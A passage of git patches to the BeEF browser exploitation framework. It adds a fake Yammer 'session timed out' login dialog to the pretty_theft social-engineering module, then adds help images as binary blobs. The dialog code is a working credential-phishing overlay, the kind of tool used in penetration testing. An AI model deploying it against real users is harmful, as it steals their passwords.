+		var buttonstyle   = 'style="font-size: 13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"';
+		var logo  = 'https://www.yammer.com/favicon.ico';
+		var title = 'Session Timed Out <img src="' + logo + '" align=right height=24 width=24 alt="Yammer">';
+		var messagewords = 'Your Yammer session has timed out due to inactivity.<br/><br/>Please re-enter your username and password to login.';
+		var buttonLabel  = '<input type="button" name="ok" value="Sign In" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>';
 
 		// Build page including styles
 		sneakydiv.innerHTML= '<div id="window_container" '+windowborder+ '><div id="windowmain" ' +windowmain+ '><div id="title_bar" ' +tbarstyle+ '>' +title+ '</div><p id="message" ' +messagestyle+ '>' + messagewords + '</p><table><tr><td align="right"> <div id="box_pre" ' +box_prestyle+ '>Username: </div></td><td align="left"><input type="text" id="uname" value="" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="right"><div id="box_pre" ' +box_prestyle+ '>Password: </div></td><td align="left"><input type="password" id="pass" name="pass" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div>';
@@ -224,6 +254,8 @@ beef.execute(function() {
 			linkedin(); break;
 		case "YouTube":
 			youtube();  break;
+		case "Yammer":
+			yammer();   break;
 		default:
 			generic();  break;
 	}
diff --git a/modules/social_engineering/pretty_theft/module.rb b/modules/social_engineering/pretty_theft/module.rb
index 3a15d7be5..07e1aea9b 100644
--- a/modules/social_engineering/pretty_theft/module.rb
+++ b/modules/social_engineering/pretty_theft/module.rb
@@ -9,7 +9,7 @@ class Pretty_theft < BeEF::Core::Command
     configuration = BeEF::Core::Configuration.instance
     logo_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png"
     return [
-		{'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['YouTube'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true },
+		{'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['YouTube'],['Yammer'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true },
        		
 		{'name' => 'backing', 'type' => 'combobox', 'ui_label' => 'Backing', 'store_type' => 'arraystore', 'store_fields' => ['backing'], 'store_data' => [['Grey'],['Clear']], 'valueField' => 'backing', 'value' => 'Grey', editable: false, 'displayField' => 'backing', 'mode' => 'local', 'autoWidth' => true },
 

From 0734bb0750313880b89e3c75832ad35888276370 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 20 Feb 2013 00:57:53 +1030
Subject: [PATCH 210/397] Update Proxy tab

---
 extensions/admin_ui/media/images/help/forge.png  | Bin 0 -> 5726 bytes
 .../admin_ui/media/images/help/history.png       | Bin 0 -> 4697 bytes
 extensions/admin_ui/media/images/help/proxy.png  | Bin 0 -> 9597 bytes
 .../javascript/ui/panel/tabs/ZombieTabRider.js   |   2 +-
 4 files changed, 1 insertion(+), 1 deletion(-)
 create mode 100644 extensions/admin_ui/media/images/help/forge.png
 create mode 100644 extensions/admin_ui/media/images/help/history.png
 create mode 100644 extensions/admin_ui/media/images/help/proxy.png

diff --git a/extensions/admin_ui/media/images/help/forge.png b/extensions/admin_ui/media/images/help/forge.png
new file mode 100644
index 0000000000000000000000000000000000000000..b240956627802fca86760080151d4961cbf812bd
GIT binary patch
literal 5726
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
z%0A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
KOR-AcBI19XJek=5

literal 0
HcmV?d00001

diff --git a/extensions/admin_ui/media/images/help/history.png b/extensions/admin_ui/media/images/help/history.png
new file mode 100644
index 0000000000000000000000000000000000000000..c92c4a72b58e97e012a9c41e51909c4c257431c9
GIT binary patch
literal 4697
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
